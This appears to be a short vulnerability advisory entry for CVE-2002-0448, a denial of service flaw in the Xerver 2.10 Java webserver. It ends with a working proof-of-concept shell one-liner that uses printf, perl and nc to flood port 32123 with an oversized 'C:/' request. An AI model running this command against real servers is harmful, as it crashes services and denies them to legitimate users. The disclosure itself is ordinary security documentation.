Xerver 2.10 - Multiple Request Denial of Service Vulnerabilities

Related Vulnerabilities: CVE-2002-0448  
Publish Date: 08 Mar 2002
                source: http://www.securityfocus.com/bid/4254/info

Xerver is a freely available webserver, written in Java. It will run on any operating system with Java installed, including Microsoft Windows, Unix/Linux variants, MacOS, etc.

It has been reported that sending an excessive number of requests for 'C:\' to port 32123 will cause the webserver to crash, denying service to legitimate users. This appears to be the case even on non-Windows based operating systems running the vulnerable software.

The webserver will need to be restarted to regain normal functionality.

This issue was reported for v2.10 of Xerver. Earlier versions may also be affected.

printf "GET /`perl -e 'print "C:/"x500000'`\r\n\r\n" |nc -vvn 32123